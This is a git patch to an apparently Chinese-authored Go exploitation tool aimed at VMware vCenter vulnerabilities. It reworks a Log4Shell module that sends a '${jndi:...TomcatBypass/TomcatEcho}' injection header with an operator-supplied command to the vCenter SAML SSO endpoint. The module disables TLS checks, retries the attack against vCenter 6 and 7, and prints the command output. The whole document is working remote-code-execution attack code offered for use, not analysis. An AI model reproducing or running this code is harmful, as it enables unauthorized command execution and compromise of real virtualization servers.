From 8acfc2789026e94adbb3da5c0d3c408865df06ff Mon Sep 17 00:00:00 2001 From: root Date: Tue, 11 Oct 2022 16:15:02 +0800 Subject: [PATCH] v1.3.4 bug fix --- go.mod | 1 + go.sum | 3 +++ main.go | 11 ++------ src/log4jcenter/log4j.go | 57 +++++++++++++++++++++++++++++++--------- 4 files changed, 50 insertions(+), 22 deletions(-) diff --git a/go.mod b/go.mod index 8599d87..f3365e6 100644 --- a/go.mod +++ b/go.mod @@ -8,6 +8,7 @@ require ( github.com/cheekybits/genny v1.0.0 // indirect github.com/fatih/color v1.13.0 // indirect github.com/fsnotify/fsnotify v1.5.4 // indirect + github.com/go-resty/resty/v2 v2.7.0 // indirect github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 // indirect github.com/hashicorp/errwrap v1.1.0 // indirect github.com/hashicorp/go-multierror v1.1.1 // indirect diff --git a/go.sum b/go.sum index d83b970..75a48f9 100644 --- a/go.sum +++ b/go.sum @@ -34,6 +34,8 @@ github.com/fsnotify/fsnotify v1.5.4/go.mod h1:OVB6XrOHzAwXMpEM7uPOzcehqUV2UqJxmV github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/gliderlabs/ssh v0.1.1/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= +github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= +github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 h1:p104kn46Q8WdvHunIJ9dAyjPVtrBPhSr3KT2yUst43I= github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0/go.mod h1:fyg7847qk6SyHyPtNmDHnmrv/HOrqktSC+C9fM+CJOE= github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= @@ -201,6 +203,7 @@ golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwY golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= golang.org/x/net v0.0.0-20210428140749-89ef3d95e781/go.mod h1:OJAsFXCWl8Ukc7SiCT/9KSuxbyM7479/AVlXFRxuMCk= +golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220624214902-1bab6f366d9e/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= diff --git a/main.go b/main.go index d56c5ee..c1b1203 100644 --- a/main.go +++ b/main.go @@ -29,7 +29,7 @@ func usage() { -u url you target, example: https://192.168.1.1 -m module - you selected cve code, example: 21972 or 22205 or 21985 or log4center + you selected cve code, example: 21972 or 22005 or 21985 or log4center -c command you want execute command, example: "whoami" -f filename @@ -117,14 +117,7 @@ func main() { usage() os.Exit(0) } else { - if log4jcenter.Exec_cmd(url, rmi, command, "6") { - // - } else { - fmt.Println("[-] Vcenter 6.X paylaod 利用失败,尝试7.0") - if !log4jcenter.Exec_cmd(url, rmi, command, "7") { - fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.") - } - } + log4jcenter.Execc(url, rmi, command) } } else { diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go index 2b8a47a..2c3c15a 100644 --- a/src/log4jcenter/log4j.go +++ b/src/log4jcenter/log4j.go @@ -1,13 +1,17 @@ package log4jcenter import ( + "crypto/tls" "fmt" + "io" "net" "os" "strings" "sync" "time" + "github.com/go-resty/resty/v2" + "github.com/imroc/req/v3" ) @@ -127,12 +131,15 @@ func exploit(url, rmiserver string) { } -func Exec_cmd(url, rmiserver, command, version string) bool { +func exec_cmd(url, rmiserver, command, version string) (bool, string) { host := rmiserver client := req.C() client.EnableForceHTTP1() + // client.DisableAutoReadResponse() + // client.SetUnixSocket("1.sock") client.EnableInsecureSkipVerify() - client.SetTimeout(2 * time.Second) + client.DisableAutoReadResponse() + client.SetTimeout(4 * time.Second) // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 rmi_server := "" cmd := "" @@ -143,7 +150,7 @@ func Exec_cmd(url, rmiserver, command, version string) bool { rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) cmd = command + ";echo 'nmsl'" } - + _ = cmd myheader := map[string]string{ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", @@ -157,32 +164,56 @@ func Exec_cmd(url, rmiserver, command, version string) bool { "Cmd": cmd, } - resp, err := client.R(). + cli := resty.New().SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) + + resp, err := cli.R(). + EnableTrace(). SetHeaders(myheader). Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=") - if err != nil && strings.Contains(err.Error(), "EOF") { - // - } else if err == nil { - - // log.Fatal(err) + _ = err + // fmt.Println(resp.String()) + // resp, err := client.R(). + // SetHeaders(myheader). + // Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=") + if err != nil && err == io.ErrUnexpectedEOF { + // + } else if strings.Contains(err.Error(), "NO_ERROR") { + // } else { fmt.Println("[-] 连接失败,请检查网络.") os.Exit(0) } - if resp.StatusCode == 200 { + if resp.StatusCode() == 200 { result := resp.String() result = strings.Split(result, "nmsl")[0] result = strings.TrimRight(result, "\n") - fmt.Println(result) - return true + // fmt.Println(resp.String()) + // fmt.Println(result) + // fmt.Println(1) + return true, result } else { - return false + return false, "" } } +func Execc(url, rmiserver, command string) { + for i := 0; i < 5; i++ { + temp1, temp2 := exec_cmd(url, rmiserver, command, "7") + if temp1 { + fmt.Println(temp2) + break + } + temp3, temp4 := exec_cmd(url, rmiserver, command, "6") + if temp3 { + fmt.Println(temp4) + break + } + } +} + func getIpAddr2(url string) string { tmp := strings.Split(url, ":")